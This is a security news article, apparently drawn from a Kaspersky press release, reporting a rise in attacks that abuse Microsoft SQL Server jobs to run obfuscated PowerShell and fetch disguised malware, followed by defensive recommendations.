Repetitive attacks via Microsoft SQL Server increased by 56% in 2022

Attacks using Microsoft SQL Server increased by 56% in September 2022 compared to the same period last year. Malicious agents continue to use a commonly deployed attack that uses Microsoft’s SQL Server to attempt to gain access to corporate IT infrastructures. The technical details of one of these incidents have been analyzed and reported in Kaspersky’s new Managed Detection and Response report.

Kaspersky experts have seen an increase in attacks using Microsoft SQL Server processes, a database management system used worldwide by both multinational companies and SMEs. As of September 2022, the number of affected SQL Servers was over 3,000 units, a 56% year-over-year growth. These attacks were effectively identified by Kaspersky Endpoint Security for Business and Managed Detection and Response.

The number of attacks following this process has gradually increased over the past year and has exceeded 3,000 attacks every month since April 2022, with the exception of a slight decrease in July and August.

“Despite the popularity of Microsoft SQL Server, organizations may not be paying enough attention to protecting against threats that may target this software. Attacks using malicious SQL Server jobs are nothing new, but they are still used by cybercriminals to gain access to a company’s infrastructure,” says Sergey Soldatov, Head of Security Operations Center at Kaspersky.

A particular problem: PowerShell scripts and .PNG files

In the new report dedicated to the most interesting incidents of Managed Detection and Response, Kaspersky researchers describe an attack using Microsoft SQL Server jobs, a sequence of commands executed by the server agent.

“Malicious agents tried to change the server configuration to gain access to the shell to execute malware via PowerShell. Compromised SQL Server attempts to execute malicious PowerShell scripts and generates connection to external IP addresses. This PowerShell script runs the malware disguised as a .png file from the external IP address using the “MsiMake” attribute, very similar to how the PurpleFox malware works,” says Soldatov.

An example of SQL tasks that contain obfuscated PowerShell commands

To protect companies from threats, Kaspersky experts recommend implementing the following measures:

• Always keep software up-to-date on all the devices you use to prevent hackers from infiltrating your network by exploiting its vulnerabilities. Install redacted patches to cover new vulnerabilities as soon as possible. Once a patch is downloaded, threat actors can no longer exploit the affected vulnerability.

• Use the latest threat intelligence to stay ahead of actual TTPs used by threat actors.

• Choose a reliable endpoint security solution, such as Kaspersky Endpoint Security for Business, which has behavior-based detection and anomaly control features for optimal protection against known and unknown threats.

• Dedicated services can help combat large-scale attacks. The Kaspersky Managed Detection and Response service helps identify and stop intrusions at an early stage, before the perpetrators reach their targets. If you are faced with an incident, the Kaspersky Incident Response service will help you react and minimize the consequences, in particular to identify compromised nodes and protect the infrastructure from similar attacks in the future.

Leave a Comment